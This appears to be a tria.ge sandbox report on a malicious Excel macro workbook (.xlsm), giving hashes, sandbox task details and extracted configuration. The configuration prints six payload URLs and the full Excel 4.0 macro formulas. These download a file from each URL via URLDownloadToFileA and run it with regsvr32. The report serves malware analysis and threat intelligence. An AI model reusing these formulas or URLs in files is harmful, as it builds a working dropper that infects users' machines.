Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Behavioral task
behavioral1
Sample
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm
Resource
win10v2004-20241007-en
General
-
Target
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309
-
Size
49KB
-
MD5
f020f228e8ab39be16537b62d4dbc173
-
SHA1
477c146ef8dbd20a3974928d5f9135a847fd09fd
-
SHA256
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309
-
SHA512
83021a786a4c818078f9c259159c043b9cac6f3cb1287c06e5e641e2984b3d8f135e354644b1557adc000096184d27ce78bc874b45f675e98be920fbe1c9e151
-
SSDEEP
768:SYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:SYu2xXncDSmSIBlGeuSEcm2h0B5lqB
Malware Config
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()
Signatures
Files
-
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm office2007